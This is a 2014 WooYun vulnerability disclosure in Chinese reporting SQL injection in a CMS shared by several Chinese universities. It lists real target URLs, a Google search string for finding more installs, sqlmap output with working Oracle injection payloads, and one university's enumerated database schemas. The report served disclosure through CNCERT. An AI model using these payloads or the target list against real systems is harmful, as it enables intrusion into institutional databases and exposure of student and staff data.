当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071081

漏洞标题:某高校通用CMS存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-08-05 15:23

修复时间:2014-11-03 15:24

公开时间:2014-11-03 15:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-10: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向第三方安全合作伙伴开放
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

详细说明:

贵州大学主站http://www.gzife.edu.cn/portal

Snap1.jpg


注入点:http://portal.gzife.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail_home.jsp?infoId=56415&config_id=23366

Snap2.jpg


Snap3.jpg


开始扩大范围
Google关键字eapdomain/static/component/cms/cmp_cms_pim_show

Snap4.jpg


大概收集到这几个

http://portal.ruc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6377&config_id=5168
http://info.pumc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=11665&config_id=5039
http://portal.shfc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showMoreInfoList.jsp?configId=15715
http://portal.cupes.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/noteDetailShow.jsp?noteId=18896
http://info.btbu.edu.cn:8080/eapdomain/static/component/cms/cmp_cms_pim_show/infoList.jsp?ID=5586
http://xgb.uibe.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6227&config_id=8340


不会构造关键字,也许没有找全,上述中有一些可能不行
还有一些需要登录后才能访问
如http://portal.dlut.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showFileInfo.jsp?infoId=306395&config_id=4747
http://portal.shisu.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=27491&config_id=22088

漏洞证明:

http://portal.gzife.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail_home.jsp?infoId=56415&config_id=23366 贵州财经大学

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: config_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infoId=56437&config_id=23366 AND 3531=3531
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: infoId=56437&config_id=23366 AND 9967=(SELECT UPPER(XMLType(CHR(60)
||CHR(58)||CHR(113)||CHR(104)||CHR(121)||CHR(116)||CHR(113)||(SELECT (CASE WHEN
(9967=9967) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(119)||CHR(103
)||CHR(113)||CHR(62))) FROM DUAL)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: infoId=56437&config_id=-3984 UNION ALL SELECT NULL,CHR(113)||CHR(10
4)||CHR(121)||CHR(116)||CHR(113)||CHR(100)||CHR(99)||CHR(97)||CHR(113)||CHR(119)
||CHR(114)||CHR(87)||CHR(88)||CHR(110)||CHR(76)||CHR(113)||CHR(117)||CHR(119)||C
HR(103)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infoId=56437&config_id=23366 AND 5820=DBMS_PIPE.RECEIVE_MESSAGE(CHR
(105)||CHR(120)||CHR(117)||CHR(86),5)
---


web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle


数据库

available databases [66]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DCP
[*] DCP_APPS
[*] DCP_CMS
[*] DCP_EDP
[*] DCP_PORTAL
[*] DCP_SNS
[*] EXFSYS
[*] FLOWS_FILES
[*] ICDC_BG
[*] ICDC_BI
[*] ICDC_CW
[*] ICDC_DM
[*] ICDC_EDU_REPORT
[*] ICDC_JG
[*] ICDC_JX
[*] ICDC_KQ
[*] ICDC_KY
[*] ICDC_LOG
[*] ICDC_ODS
[*] ICDC_REPORT
[*] ICDC_TS
[*] ICDC_TYWS
[*] ICDC_UTIL
[*] ICDC_WSTB
[*] ICDC_WSTB_NEW
[*] ICDC_XS
[*] ICDC_XX
[*] ICDC_ZC
[*] LBACSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SEAS715
[*] SMS
[*] SMSNEW
[*] SNPM
[*] SNPM_GJ
[*] SNPW
[*] SNPW_GJ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] URP_AHU
[*] URP_COMMON
[*] URP_GZIFE
[*] URP_INFORMATION
[*] URP_INSU
[*] URP_PARTTIMEJOB
[*] URP_POSTDOC
[*] URP_RECRUIT
[*] URP_STAFF
[*] URP_STANDARD
[*] URP_SUB
[*] URP_SYSTEM
[*] URP_TEACHER
[*] URP_WAGE
[*] WMSYS
[*] XDB
[*] YKT


--------
http://xgb.uibe.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6227&config_id=8340 对外经济贸易大学学工网

---
Place: GET
Parameter: config_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infoId=6227&config_id=8340 AND 2389=2389
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: infoId=6227&config_id=8340 AND 9745=(SELECT COUNT(*) FROM ALL_USERS
 T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---


web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle


Snap5.jpg


---------
http://portal.shfc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=18230&config_id=15715 上海金融学院

---
Place: GET
Parameter: configId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: configId=15715 AND 2128=2128
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: configId=15715 AND 6665=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(81)
||CHR(84)||CHR(81),5)
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle


----------
http://portal.ruc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6377&config_id=5168 中国人民大学

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: config_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infoId=6377&config_id=5168 AND 8103=8103
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: infoId=6377&config_id=5168 AND 7245=(SELECT COUNT(*) FROM ALL_USERS
 T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-08-10 09:29

厂商回复:

c

最新状态:

暂无

漏洞评价:

评论